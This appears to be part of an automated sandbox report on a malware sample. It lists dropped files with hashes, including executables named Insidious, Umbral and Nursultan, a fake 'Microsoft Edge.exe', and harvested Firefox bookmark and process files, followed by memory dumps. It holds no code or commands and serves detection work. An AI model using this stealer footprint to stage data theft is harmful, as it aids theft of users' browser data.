59b789e6212dbe7d83282ca3f9e6893b86dd9eb23c9ea7acfe0fcfc0ab9762bc

SHA512
0fb2382ba9547d512d22f8e48999a9c1742d0359bb390707b136df3091bae28183451c7ebd9c6caf35ad8ab39899c72b67201d281ccba57d8d08a7dd73905285

Download Submit
C:\ProgramData\44\Process.txt

Filesize
3KB

MD5
d813e5b9d22159cb273e09503be628bc

SHA1
4b366a6e00db930bf464b17d2d9cd22906e7a150

SHA256
b0f2555a67c0c077e8c7e1c4247c8d3231f0c92cd65e7fac60f566292c46ba19

SHA512
333be4ab58ab981ec5b7616236fc05b5ec25b0d0f5a6fe04c84520ea441961a6f3fb5f8f685663f7d8c91eee90f43d77bed6df61be9c50479eb3d6a6c1596892

Download Submit
C:\Users\Admin\AppData\Local\44\Process.txt

Filesize
678B

MD5
35033f145af2201261da7b15135d0e8e

SHA1
c12a363aa68ea00c9f5043209ec4f99cffaaecc6

SHA256
dac32afdf7114dde260cf28e7f057e6e47fa6607d7d738217f236882fdb28f7f

SHA512
8130e4d1e0286599cfd8d036da9852e71b1f470641113dce50e81d8dbe6a587619295efda203f5820292e7b981e97c182c02f3347bf2fd67ac84d961cfc4ed42

Download Submit
C:\Users\Admin\AppData\Local\Temp\Insidious.exe

Filesize
274KB

MD5
b70c03532081c928f946e844c5d2172d

SHA1
7908b1d1e9ab5e222faa6c816dd861382aa4a5c5

SHA256
3cf9d10fb9434a9c83d0fb65401e65b11fa643264ff17b5a9d75022e5d41ae29

SHA512
81e4df48e246e3d842ddf8834bd96388f38e72ead2ae5f46a473dc9bbfe56621e5912f51a7dea1ba523b28144e11305ef29d48c61ca3525c80efc0a76a265ecb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Microsoft Edge.exe

Filesize
207KB

MD5
c2a5cd7c5f8a633bafb54b62cee38077

SHA1
033474beffb4c91158bd208eb80b39c0a26f6b2d

SHA256
dfcf3ed114355b554d2a3814946029c2688c4f617959b69375ed730250b9e9b1

SHA512
556a2ce11d01de6c940306da1a1d27bfe95ec52071a0762fd5f27fc5d9d4be7bd50f9bc7df922f483f8068783dd29cf81c9a492656da21285c91404f1d603ddc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

Filesize
787KB

MD5
a99954bff017983bf455de31c5f0696a

SHA1
6302c232c1dd4da3b0a013b95f94f7619b354d0a

SHA256
4c9980b653343c08d0162d2d8a6f6488bd2ca34a5fcd14762670b872315d39c6

SHA512
9646425af49b96389d08eac718a1fcac51b97035a83e208be7a667c2036258e134bd0e56187699361b4cb8728e2f6e81532ad33316e95aee8511e3d0da0d1f05

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nursultan2.exe

Filesize
592KB

MD5
0ba8218f991e81620f31083273ee7d91

SHA1
980539589b8bba6e619c836436d8c5ba8aebd18a

SHA256
738c2f09d5ab56751bd47c492a743208291dc7ce128b7f0eacfcc9eedf97c786

SHA512
1277a5b997393b77de8a4351a14a6b506deb6268cbabaccbbed7027da4eeebe9c0521d4fa21d1fa17f7734e59feecad15026caf4ffe5fbd44690b00f8e8bc7ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
231KB

MD5
df69e1468a4656f2eec526de59a89a8b

SHA1
e65e192be57cd672b8ef19cd72ad89cbd3f8f60a

SHA256
4d3a9636e9d29f227b56d7bf140154384e1f426b69cf213ae46115e8d966aa92

SHA512
409dca3f4ce130034b3004726939a59f38939d46e09f04d6c8a77ea20e3ff931d1a7332f00c06c3e46d8c64796ac93299c2f5a6595777f3e05cf89bc0522449f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nursultan.bat

Filesize
9KB

MD5
a4e674b923499465dd85b96b18ebcf3d

SHA1
65838ccfc2b3a0b4928cfef85c50ff33e54df1cf

SHA256
433662d2a7e13057d8575252b953abbafbd9b932bf778c989124d5db2c1ebcf9

SHA512
591e2f147a44419558e12bc140e19f7fe68b4b588b44986d3fe46c5141ca1fce9f6fc78e43f136912b79368aa0bd33279b326ef81473ee373e38ded73d80f710

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp17A7.tmp.tmpdb

Filesize
5.0MB

MD5
e87d64670a56c2a625658096ae73408f

SHA1
9dee648b8d5660e09416e33d66b7d09b3fc3db98

SHA256
d3fbdfb580352a821362428d3f90d8fc11dc00afecd1b1bae5bb125de15435e6

SHA512
23de58acd9030113477588ac1c55e8cc1011babdf06f0fde1f6cfd51cf65fe33f7774faff028e8c69eae860419c44e326126b7e2960ca68c25687e48236b8138

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp17B7.tmp.tmpdb

Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF6CD.tmp.dat

Filesize
92KB

MD5
2cd7a684788f438d7a7ae3946df2e26f

SHA1
3e5a60f38395f3c10d9243ba696468d2bb698a14

SHA256
2ebed8dd3531958e857c87ddbf46376b8a10ea2f364d2399d9fcc604da0bee1d

SHA512
0fec4b36e2173d1ad5eca880e1be1d0c7093d459aeb612d371e4ac92fbeaea55beb36e9228d36d57fe1851bd4d57b26dd5b8edb4620fb17b91441e840669c7d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF6DE.tmp.dat

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Roaming\44\Browsers\Firefox\Bookmarks.txt

Filesize
315B

MD5
71227f862899452aa270d580a8b090c8

SHA1
13a6dc9506be2066777ec34acbe5ab62684c4929

SHA256
22e5316f3216208507c8ae67cbb2a90cfcf4389dae87f8f71c3388593eca57c1

SHA512
126c549e82d679bb9d3e229b09c3dded86b72aa5a98cb956a0d2a740ca43a4da14049134c3836c49ef50e76bb0a69fe158bb776a4c86a7e7b04893ced8ba5b5a

Download Submit
C:\Users\Admin\AppData\Roaming\44\Browsers\Firefox\Bookmarks.txt

Filesize
420B

MD5
01735e34db13c5f93eead0f8572adb67

SHA1
5b819f76344907d93f62ecd11e2a2cbd514bee2f

SHA256
bca74f82c72da083cf88a725f198e0730982595bfa6a137e46d0b77b81552f4d

SHA512
e833925ccd15947e9234b72cf06e2620b3d982dd4840e5c5cae31634f437702b10c29db85fbb5115490f1d72f4bb5b935815fb14f6221ace756216604101924c

Download Submit
C:\Users\Admin\AppData\Roaming\44\Browsers\Firefox\Bookmarks.txt

Filesize
525B

MD5
74d90dd5a73f1679bd73fdce50983c50

SHA1
6f374995ce4842a9f07fc1a935833003066820bb

SHA256
da34d9a479cfcc31980c9be0a13eb90defa37ec3438f114f03f12649a415cfb9

SHA512
ad173b782022b72727c9a1d66aa7509ac316450d18561b018ddf563fe921636ea32d9615019ee0fb3be7a8b781154c5e09f6916547bbb7ab4484d3fea509b95f

Download Submit
C:\Users\Admin\AppData\Roaming\44\Browsers\Firefox\Bookmarks.txt

Filesize
630B

MD5
aef24d8d3c507674cea8b016e2f4e6a3

SHA1
411eb0cddf04fa969a50736544ac4a6a9a545b80

SHA256
0fe82ba06f72db753abdf7a51b016bb6ccb880deb1850f56c921264fb2d419da

SHA512
33904ba625025eb67370ac60d07a2150cb3e4228867716f109e7fb9a470e71987178f1aa209eac6de20734e4e41fbb336c0e9671b4397dab90edc2d6c41b883f

Download Submit
C:\Users\Admin\AppData\Roaming\44\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Roaming\44\Browsers\Firefox\Bookmarks.txt

Filesize
210B

MD5
1267f4be35fbe5510886cf08ddee9fdd

SHA1
04e714a1c8a9d76e860c7cbbe7ebf62c71dea6b9

SHA256
ab038447adbfd1faf46f0d3bf6dc387621dc8435ab552696ec8d9bbe7a6a9ab3

SHA512
6f1bc0ad9eb850f37cddc2422e738f0cbbfe8a7a7e064c0c989cafbf0f7d5ae5bdfced4b3f93952688de3bfa338ff5a8c7258aff8397cdaccb36b23b5d16686b

Download Submit
C:\Users\Admin\AppData\Roaming\44\Process.txt

Filesize
2KB

MD5
e6295f6f837188ac5d2c48f987f8d7a7

SHA1
7e4cc657bc1985565fec4d7685e39dbd50b85d2a

SHA256
38518af453fb9bb80f941d2b2055f2c3fba7c6dd60c89c21563c8697811d0a45

SHA512
7e392e69ac9f3af04a9b2fd5e174fab70a4e438a5ab29d0d5fa4fe8d5c078037927ab41ac6a84818c92ab5c62546d4f0fcc3d3ab3dca7479b5b3d26ccfe470be

Download Submit
C:\Users\Admin\AppData\Roaming\44\Process.txt

Filesize
3KB

MD5
0aa37372b954d42c3f3601201106fae8

SHA1
dba0803beac0f89668d58b461bf656c878485449

SHA256
328c444452a8a9ed1c8bdce78848335ad68ae10c287cb7563651a990fd290e99

SHA512
674f25fe85e6c83171403ca748536a90b2f727dd7ccfb5bf0f96320383e5a9a0bcc0edf7e56a7bb43bce96eade37cd06cb52eb6d6a23cd833e6d2bc11230bf1b

Download Submit
C:\Users\Admin\AppData\Roaming\44\Process.txt

Filesize
3KB

MD5
ec2d7c249d6997ed59dbcc30283dff55

SHA1
96acbb4b9d53d3d8d92232d7a1997d468f29e201

SHA256
1828ec2c57c61ebc1e9463400c25bc35e385c96256b4e0878721deeffcc10e25

SHA512
0539f70fb0943d0765cb65c1bec3fe8cbb4b5e217905d7e3ec9374a9fac93972e4c5282dcdeaaf3358327abc91e744f6a9702dbb7d2e50a69b7827369cfd119f

Download Submit
C:\Users\Admin\AppData\Roaming\44\Process.txt

Filesize
6KB

MD5
f907e3c47e7f3f6d817260e789281253

SHA1
225fb1fa14aa2b4353490f5780bba64be3739afc

SHA256
a5ae25073653eea7b5a679232b98598828e28984dde41428368c3018f868d563

SHA512
8f6e09b6f07ac6e4bb33c20bdd9fde2669433417aa73cef89882b0a7846c76a4ed9d514a10b1a4a38d823557736bd29812d693794eeea29419dcc00c024555a9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
e713637dfd943215912c5a390249ea68

SHA1
51ef60407a94a1b7573c3d893301bc6787a1f30f

SHA256
85b10729f9ee2f6b8e00d4abc57e25aff229ea0ffe7964f9af755eb3dc022d5c

SHA512
1005b019ada0e4178fa8faf2d28b06a73ffd676dc78c34453752c2a06392f5b44a3399efc605d3354059a3e0474e0d2bc9a0e63a796e7e482c365a4dcf8bd7d5

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AG2O82LZ7G9NCG8M4I64.temp

Filesize
7KB

MD5
b42ae035396b5d57b327a98f336ea732

SHA1
97fa3b676051b12a83d62307a8f6209bca0af853

SHA256
f50c7dd5948f2e53711f89f089c8fad7242e723c8b13d4b18372abec44b054fb

SHA512
fb63eaaba2ab9355aa266dd4e36247e12bf5ef1a5659b91898e8971a7c0a37f19a2f301b2cb697873bcf8cd55b3304aa72c969afec4371f0b052b1dbbf035054

Download Submit
memory/712-241-0x00000000003A0000-0x00000000003EA000-memory.dmp

Filesize
296KB

Download
memory/1052-366-0x0000000000060000-0x00000000000AA000-memory.dmp

Filesize
296KB

Download
memory/1268-14-0x0000000000C40000-0x0000000000C78000-memory.dmp

Filesize
224KB

Download
memory/1440-39-0x0000000001010000-0x000000000105A000-memory.dmp

Filesize
296KB

Download
memory/1716-47-0x0000000000F60000-0x0000000000FA0000-memory.dmp

Filesize
256KB

Download
memory/1972-631-0x0000000001300000-0x000000000134A000-memory.dmp

Filesize
296KB

Download
memory/2120-1-0x0000000000090000-0x0000000000176000-memory.dmp

Filesize
920KB

Download
memory/2120-13-0x000007FEF5B40000-0x000007FEF652C000-memory.dmp

Filesize
9.9MB

Download
memory/2120-195-0x000007FEF5B40000-0x000007FEF652C000-memory.dmp

Filesize
9.9MB

Download
memory/2120-0-0x000007FEF5B43000-0x000007FEF5B44000-memory.dmp

Filesize
4KB

Download
memory/2416-23-0x000007FEF5B40000-0x000007FEF652C000-memory.dmp

Filesize
9.9MB

Download
memory/2416-12-0x0000000000BB0000-0x0000000000C7A000-memory.dmp

Filesize
808KB

Download
memory/2416-15-0x000007FEF5B40000-0x000007FEF652C000-memory.dmp

Filesize
9.9MB

Download
memory/2556-1789-0x0000000001210000-0x000000000125A000-memory.dmp

Filesize
296KB

Download
memory/2732-22-0x0000000000110000-0x00000000001AA000-memory.dmp

Filesize
616KB

Download
memory/2996-119-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2996-120-0x00000000022E0000-0x00000000022E8000-memory.dmp

Filesize
32KB

Download
memory/3000-112-0x000000001B770000-0x000000001BA52000-memory.dmp

Filesize
2.9MB

Download
memory/3000-113-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download
memory/3172-1354-0x00000000011F0000-0x000000000123A000-memory.dmp

Filesize
296KB

Download
memory/3176-1571-0x0000000001340000-0x000000000138A000-memory.dmp

Filesize
296KB

Download
memory/3420-930-0x00000000008C0000-0x000000000090A000-memory.dmp

Filesize
296KB

Download
memory/3916-1122-0x0000000000AC0000-0x0000000000B0A000-memory.dmp

Filesize
296KB

Download